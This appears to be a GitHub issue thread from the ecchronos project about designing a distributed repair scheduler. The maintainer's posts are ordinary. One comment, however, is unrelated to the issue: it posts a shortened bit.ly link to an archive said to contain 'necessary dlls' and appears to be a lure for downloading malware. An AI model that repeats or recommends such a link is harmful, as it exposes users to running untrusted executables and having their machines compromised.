### ISSUE TITLE
Investigate Creation of RepairScheduler and ScheduleManager

### ISSUE THREAD

**Issue by VictorCavichioli** [Ericsson/ecchronos#714]
Story Description:
After connecting with the specified nodes list, know we need to care about creating a Scheduler to run the repairs, the goal is to analyse it and provide a design based on a distributed architecture.

Acceptance Criteria:
NA

Definition of Done:
Initial study done and approved by maintainers

Notes:

Related to #652

**Comment by Buqra55** [comment]
try this
https://bit.ly/4gx42eQ
I put the necessary dlls in the archive

**Comment by VictorCavichioli** [comment]
PR merged
